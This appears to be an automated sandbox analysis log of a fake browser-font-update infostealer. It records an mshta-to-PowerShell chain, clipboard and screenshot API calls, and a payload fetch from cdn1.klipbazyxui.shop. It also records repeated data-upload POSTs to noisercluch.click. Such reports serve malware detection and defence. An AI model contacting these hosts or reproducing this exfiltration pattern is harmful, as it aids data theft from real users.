Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49988 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: noisercluch.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: noisercluch.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O5AQ2FI3ESYY4EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12811Host: noisercluch.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U160XEKHTB7Z5JZ0HYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15077Host: noisercluch.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FWGB2B01JZG6DGFXVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20561Host: noisercluch.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HVG2RJ7YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1186Host: noisercluch.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JHX85ADRORZATNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584391Host: noisercluch.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: noisercluch.click

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /web44.dle HTTP/1.1Host: cdn1.klipbazyxui.shopConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: cdn1.klipbazyxui.shop
Source: global traffic	DNS traffic detected: DNS query: noisercluch.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: noisercluch.click

Source: powershell.exe, 00000002.00000002.2134142607.0000000006289000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2908433712.000000000613A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2908433712.0000000005227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2132673786.0000000005221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2908433712.00000000050D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2908433712.0000000005227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2132673786.0000000005221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2908433712.00000000050D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBjq
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn1.k
Source: powershell.exe, 00000004.00000002.2908433712.0000000005227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn1.klipbazyxui.shop
Source: powershell.exe, 00000004.00000002.2906052404.000000000301B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2908433712.0000000005227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn1.klipbazyxui.shop/web44.dle
Source: powershell.exe, 00000004.00000002.2908433712.000000000613A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2908433712.000000000613A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2908433712.000000000613A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2908433712.0000000005227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.2946159742.0000000007410000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: powershell.exe, 00000004.00000002.2946159742.0000000007410000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: powershell.exe, 00000004.00000002.2946159742.0000000007410000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000008.00000002.4461034225.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4462135641.0000000005870000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://noisercluch.click/
Source: powershell.exe, 00000008.00000002.4462135641.0000000005870000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://noisercluch.click/V
Source: powershell.exe, 00000008.00000002.4461171399.00000000035BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://noisercluch.click/W201.0
Source: powershell.exe, 00000008.00000002.4461034225.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4461171399.00000000035BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://noisercluch.click/api
Source: powershell.exe, 00000008.00000002.4458798218.0000000003529000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://noisercluch.click/apite
Source: powershell.exe, 00000002.00000002.2134142607.0000000006289000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2908433712.000000000613A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.2946159742.0000000007410000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: powershell.exe, 00000004.00000002.2946159742.0000000007410000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: powershell.exe, 00000004.00000002.2946159742.0000000007410000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987

Source: unknown	HTTPS traffic detected: 172.67.154.95:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49982 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49984 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49985 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49986 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49988 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49989 version: TLS 1.2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_00431B10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

8_2_00431B10

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_02F61000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

8_2_02F61000

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_00431B10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

8_2_00431B10

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_00431D10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

8_2_00431D10

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 6396, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_073F8A60 NtResumeThread,		4_2_073F8A60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_073F8A5A NtResumeThread,		4_2_073F8A5A

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04F3D448	2_2_04F3D448
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04F3CB78	2_2_04F3CB78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04F3C830	2_2_04F3C830
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0727A66D	4_2_0727A66D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0727A688	4_2_0727A688
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0727AC20	4_2_0727AC20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0727AC12	4_2_0727AC12
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0727E3A8	4_2_0727E3A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0727E398	4_2_0727E398
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_072BF5B0	4_2_072BF5B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_073F2BB0	4_2_073F2BB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_073F2BAF	4_2_073F2BAF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_073F1E3F	4_2_073F1E3F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_073F1E40	4_2_073F1E40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_073F1DE1	4_2_073F1DE1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0740FA18	4_2_0740FA18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0740F1C3	4_2_0740F1C3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_074019A3	4_2_074019A3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_07407F08	4_2_07407F08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0740DF30	4_2_0740DF30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0740DEE8	4_2_0740DEE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_07407EED	4_2_07407EED
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0740FA08	4_2_0740FA08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_07400040	4_2_07400040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0740606E	4_2_0740606E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_07406078	4_2_07406078
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_07400006	4_2_07400006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0898C1F2	4_2_0898C1F2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_08987E78	4_2_08987E78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0898D808	4_2_0898D808
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_08980006	4_2_08980006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_08980040	4_2_08980040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_08985940	4_2_08985940
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_08985448	4_2_08985448
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0898C527	4_2_0898C527
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_08988ED8	4_2_08988ED8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_08988EE8	4_2_08988EE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_08987E38	4_2_08987E38
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043A0D0	8_2_0043A0D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004368A0	8_2_004368A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00426230	8_2_00426230
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0040D35C	8_2_0040D35C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00436BF0	8_2_00436BF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0040E465	8_2_0040E465
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00421550	8_2_00421550
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00415640	8_2_00415640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0042BF45	8_2_0042BF45
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00410F71	8_2_00410F71
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00408720	8_2_00408720
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0041D840	8_2_0041D840
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0041A800	8_2_0041A800
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043A800	8_2_0043A800
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043B813	8_2_0043B813
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00419820	8_2_00419820
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0041683F	8_2_0041683F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043483C	8_2_0043483C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004220C0	8_2_004220C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004380C5	8_2_004380C5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004460D5	8_2_004460D5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004230E0	8_2_004230E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004270F9	8_2_004270F9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00418095	8_2_00418095
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0042C894	8_2_0042C894
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043D140	8_2_0043D140
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0040B14F	8_2_0040B14F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00403960	8_2_00403960
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00405970	8_2_00405970
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0040C97C	8_2_0040C97C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00435135	8_2_00435135
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004061D0	8_2_004061D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0042C9DA	8_2_0042C9DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0042C9E9	8_2_0042C9E9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043E1F0	8_2_0043E1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0042C984	8_2_0042C984
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004259B0	8_2_004259B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00427A40	8_2_00427A40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043D240	8_2_0043D240
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00414A50	8_2_00414A50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0041C205	8_2_0041C205
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0041720B	8_2_0041720B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0041E230	8_2_0041E230
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0041AAE0	8_2_0041AAE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0042C289	8_2_0042C289
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00409290	8_2_00409290
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00411A94	8_2_00411A94
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0040F2A0	8_2_0040F2A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00417B75	8_2_00417B75
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00404310	8_2_00404310
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00431B10	8_2_00431B10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0040AB20	8_2_0040AB20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043D320	8_2_0043D320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0042A3B0	8_2_0042A3B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043D3B0	8_2_0043D3B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043DBB0	8_2_0043DBB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00407440	8_2_00407440
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00428C46	8_2_00428C46
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00404C50	8_2_00404C50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0041DC50	8_2_0041DC50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043D450	8_2_0043D450
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00423C60	8_2_00423C60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004164E0	8_2_004164E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004374F0	8_2_004374F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043E540	8_2_0043E540
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0041D560	8_2_0041D560
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00421D10	8_2_00421D10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043A510	8_2_0043A510
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00427D94	8_2_00427D94
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00425640	8_2_00425640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00406660	8_2_00406660
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00419605	8_2_00419605
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00405E30	8_2_00405E30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004266C0	8_2_004266C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0042FEC0	8_2_0042FEC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004226D3	8_2_004226D3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00437EA0	8_2_00437EA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043DEB0	8_2_0043DEB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00402F40	8_2_00402F40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0041F700	8_2_0041F700
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00409710	8_2_00409710
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0041DFC0	8_2_0041DFC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0042DFC3	8_2_0042DFC3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00435FF0	8_2_00435FF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00423FF1	8_2_00423FF1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00437790	8_2_00437790

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: String function: 00414A40 appears 63 times
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: String function: 00407FF0 appears 45 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 4685
Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 4685			Jump to behavior

Source: Process Memory Space: powershell.exe PID: 6396, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 4.2.powershell.exe.7510000.2.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 4.2.powershell.exe.7510000.2.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 4.2.powershell.exe.7510000.2.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 4.2.powershell.exe.7510000.2.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 4.2.powershell.exe.7510000.2.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.powershell.exe.7510000.2.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 4.2.powershell.exe.7510000.2.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 4.2.powershell.exe.7510000.2.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 4.2.powershell.exe.7510000.2.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
